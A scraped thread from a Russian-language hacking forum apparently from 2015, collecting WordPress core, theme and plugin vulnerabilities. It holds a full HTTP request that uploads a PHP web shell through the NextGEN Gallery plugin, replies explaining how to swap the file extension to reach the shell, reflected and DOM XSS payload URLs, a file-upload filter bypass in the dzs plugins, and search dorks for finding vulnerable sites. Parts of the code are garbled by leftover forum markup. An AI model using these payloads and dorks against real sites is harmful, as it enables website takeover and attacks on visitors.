ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.04.2015, 12:54
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
WordPress 4.2 stored XSS
Сообщение от None
*Details*
If the comment text is long enough, it will be truncated when inserted in
the database. The MySQL TEXT type size limit is 64 kilobytes so the comment
has to be quite long.
The truncation results in malformed HTML generated on the page. The
attacker can supply any attributes in the allowed HTML tags, in the same
way as the previous stored XSS vulnerabilities affecting WordPress.
The vulnerability bears a similarity to the one reported by Cedric Van
Bockhaven in 2014 (patched this week, after 14 months). Instead of using an
invalid UTF-8 character to truncate the comment, this time an excessively
long comment text is used for the same effect.
In these two cases the injected JavaScript apparently can't be triggered in
the administrative Dashboard, so these exploits require getting around
comment moderation e.g. by posting one harmless comment first.
*Proof of Concept*
Enter the following as a comment:
This was tested on WordPress 4.2, 4.1.2, and 4.1.1, MySQL versions 5.1.53
and 5.5.41.
*Solution*
Disable comments (Dashboard, Settings/Discussion, select as restrictive
options as possible). Do not approve any comments.
*Credits*
The vulnerability was discovered by Jouko Pynnönen of Klikki Oy.
An up-to-date version of this document:
http://klikki.fi/adv/wordpress2.html
|
|
|
29.04.2015, 16:31
|
|
Участник форума
Регистрация: 31.03.2008
Сообщений: 143
Провел на форуме:
403124
Репутация:
95
|
|
WordPress NextGEN Gallery 2.0.63 Shell Upload Vulnerability
Код:
Code:
WordPress NextGEN Gallery plugin version 2.0.63 suffers from a remote shell upload vulnerability.
# Exploit Title: Wordpress NextGEN Gallery Plugin 2.0.63 Arbitrary File
Upload
# Author: SANTHO ( @s4n7h0 )
# Vendor Homepage: http://wordpress.org/plugins/nextgen-gallery/
# Category: WebApp / CMS / Wordpress
# Version: 2.0.63 and less
---------------------------------------------------
Vulnerability Tracking
======================
Reported to vendor : Fri, May 9, 2014 at 9:20 PM
Vendor Acknowledgement : Sat, May 10, 2014 at 2:36 AM
Vendor Informed about patch release (version 2.65) : Mon, May 19, 2014 at
7:54 PM
Vulnerability Details
=======================
POST
/index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name=
HTTP/1.1
Host: target_ip
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.0) Gecko/20100101
Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[target_ip]/wp-admin/admin.php?page=ngg_addgallery
Content-Length: 630
Content-Type: multipart/form-data;
boundary=---------------------------2427186578189
Cookie:
X-Frame-Events_290365e482ebdeeed313858b8a3de791=%7B%22event%22%3A%22new_gallery%22%2C%22gallery_id%22%3A1%2C%22gallery_title%22%3A%22folder_name%22%2C%22context%22%3A%22attach_to_post%22%7D;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_57cce18206a53fed21932c6dc2920f94=admin%7C1399203127%7C70f668b775581773d1500b1b8162de42;
wp-settings-time-1=1399030444
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------2427186578189
Content-Disposition: form-data; name="name"
cmd.php.jpg
-----------------------------2427186578189
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg
The Shell can be accessible at following URL
http://[target-ip]/wp-content/gallery/folder_name/cmd.php
# 1337day.com #
Подскажите пожалуйста как этим чудом пользоваться?
|
|
|
|
29.04.2015, 16:37
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от ICQ Hool
ICQ Hool said:
↑
WordPress NextGEN Gallery 2.0.63 Shell Upload Vulnerability
Код:
Code:
WordPress NextGEN Gallery plugin version 2.0.63 suffers from a remote shell upload vulnerability.
# Exploit Title: Wordpress NextGEN Gallery Plugin 2.0.63 Arbitrary File
Upload
# Author: SANTHO ( @s4n7h0 )
# Vendor Homepage: http://wordpress.org/plugins/nextgen-gallery/
# Category: WebApp / CMS / Wordpress
# Version: 2.0.63 and less
---------------------------------------------------
Vulnerability Tracking
======================
Reported to vendor : Fri, May 9, 2014 at 9:20 PM
Vendor Acknowledgement : Sat, May 10, 2014 at 2:36 AM
Vendor Informed about patch release (version 2.65) : Mon, May 19, 2014 at
7:54 PM
Vulnerability Details
=======================
POST
/index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name=
HTTP/1.1
Host: target_ip
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.0) Gecko/20100101
Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[target_ip]/wp-admin/admin.php?page=ngg_addgallery
Content-Length: 630
Content-Type: multipart/form-data;
boundary=---------------------------2427186578189
Cookie:
X-Frame-Events_290365e482ebdeeed313858b8a3de791=%7B%22event%22%3A%22new_gallery%22%2C%22gallery_id%22%3A1%2C%22gallery_title%22%3A%22folder_name%22%2C%22context%22%3A%22attach_to_post%22%7D;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_57cce18206a53fed21932c6dc2920f94=admin%7C1399203127%7C70f668b775581773d1500b1b8162de42;
wp-settings-time-1=1399030444
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------2427186578189
Content-Disposition: form-data; name="name"
cmd.php.jpg
-----------------------------2427186578189
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg
The Shell can be accessible at following URL
http://[target-ip]/wp-content/gallery/folder_name/cmd.php
# 1337day.com #
Подскажите пожалуйста как этим чудом пользоваться?нужно отправить POST запрос, где при отправке подменить расширение с jpg на php
шелл будет по адресу /wp-content/gallery/folder_name/shell.php
|
|
|
|
29.04.2015, 19:54
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
↑
MAC PHOTO GALLERY v. 2.7
MAC PHOTO GALLERY
dork: inurl
lugins/mac-dock-gallery/ download
@version:2.7
Уязвимый код:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"]))).[/COLOR][COLOR="#DD0000"]"/uploads/mac-dock-gallery/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'albid'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Description: File Transfer'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Type: application/octet-stream'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Disposition: attachment; filename='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]basename[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Transfer-Encoding: binary'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Expires: 0'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Cache-Control: must-revalidate, post-check=0, pre-check=0'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Pragma: public'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Length: '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]filesize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]ob_clean[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]flush[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]readfile[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
POC:
PATCH:
https://wordpress.org/plugins/mac-do...y/other_notes/Ну и xss там же
Код:
Code:
http://crytotheblind.com/site/wp-content/plugins/mac-dock-gallery/mac_imageview.php?mac_albid=1">&limit=42
|
|
|
|
13.05.2015, 19:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
193811
Репутация:
724
|
|
Wordpress Twenty Fifteen Theme - DOM XSS Vulnerability - CVE-2015-3429
Affected Versions: 4.2.1 and probably below
Proof of Concept URL for DOM XSS in WordPress:
Код:
Code:
http://example.com/wp-content/themes/twentyfifteen/genericons/example.html#
Source: http://seclists.org/bugtraq/2015/May/56 |
|
|
|
13.05.2015, 20:08
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от VY_CMa
VY_CMa said:
↑
Wordpress Twenty Fifteen Theme - DOM XSS Vulnerability - CVE-2015-3429
Affected Versions:
4.2.1
and probably below
Proof of Concept URL for DOM XSS in WordPress:
Код:
Code:
http://example.com/wp-content/themes/twentyfifteen/genericons/example.html#
Source:
http://seclists.org/bugtraq/2015/May/56Или вот такой вектор для Хрома
[QUOTE="None"]
[URL="http://example.com/wp-content/themes/twentyfifteen/genericons/example.html#1
[/QUOTE]
|
|
|
|
22.05.2015, 20:54
|
|
Участник форума
Регистрация: 31.03.2008
Сообщений: 160
Провел на форуме:
706093
Репутация:
97
|
|
Сообщение от faza02
faza02 said:
↑
нужно отправить POST запрос, где при отправке подменить расширение с jpg на php
шелл будет по адресу /wp-content/gallery/folder_name/shell.php А разве для этого не нужны админ права?
|
|
|
|
05.06.2015, 00:38
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
В паблике была опубликована такая бага:
https://www.exploit-db.com/exploits/37166/ - [SIZE="2"][B]WordPress dzs-zoomsounds Plugins invalid extension - disallowed_filetypeshideFeedbacksCall()'[/COLOR] );
}
if (!is_writable($upload_dir)) {
die('dir not writable - check permissionshideFeedbacksCall()');
}
if (copy($_FILES['file_field']['tmp_name'],$path)) {
echo'file uploadedtop.hideFeedbacksCall();';
} else {
echo'file could not be uploadedwindow.hideFeedback sCall()';
}
} else {
$headers=get_theheaders();
if (isset($headers['HTTP_X_FILE_NAME'])) {
//print_r($headers);
$file_name=$headers['HTTP_X_FILE_NAME'];
$file_name=str_replace(" ","_",$file_name);// strip spaces
$target=$upload_dir."/".$file_name;
//==== checking for disallowed file types
$sw=false;
foreach ($disallowed_filetypesas$dft) {
$pos=strpos($file_name,$dft);
if ($pos!==false) {
$sw=true;
}
}
if ($sw==true) {
die('invalid extension - disallowed_filetypes');
}
if (!is_writable($upload_dir)) {
die('dir not writable - check permissions');
}
//echo $target;
$content=file_get_contents("php://input");
if (file_put_contents($target,$content)) {
echo'success';
} else {
die('error at file_put_contents');
}
} else {
die('not for direct access');
}
}[/COLOR]
[/PHP]
максимальная строчка с набором расширений на глаза попалась такая:
$disallowed_filetypes = array('.php', '.exe', '.shtml', '.html', '.htm','.phtml','.php5', '.php4', '.pl', '.py', '.rb', '.htaccess', '.asp', '.jsp', '.aspx');
но кто поймет этот участок кода:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]foreach ([/COLOR][COLOR="#0000BB"]$disallowed_filetypes[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$dft[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$pos[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file_name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$dft[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$pos[/COLOR][COLOR="#007700"]!==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$sw[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
}
}[/COLOR][/COLOR]
поймет что нам это не помеха ;-)
Пассивные XSS:
wp-content/plugins/dzs-videogallery/ajax.php?source="/>alert();
wp-content/plugins/dzs-videogallery/ajax.php?type="/>alert();
http://digitalzoomstudio.net/ - блог автора
http://codecanyon.net/user/ZoomIt/portfolio - портфолио продаж компонентов
P.S: Тэги для гугла)) dzs-videogallery exploit, dzs-zoomsounds exploit, dzs-calendar exploit, html5uploader exploit, php_ygallery exploit, php_mediagallery exploit, custom_rapista exploit, themes/royale/ exploit |
|
|
|
05.06.2015, 22:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
5775
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
↑
foreach (
$disallowed_filetypes
as
$dft
) {
$pos
=
strpos
(
$file_name
,
$dft
);
if (
$pos
!==
false
) {
$sw
=
true
;
}
}А как такое обходиться ?
|
|
|
|
05.06.2015, 22:51
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
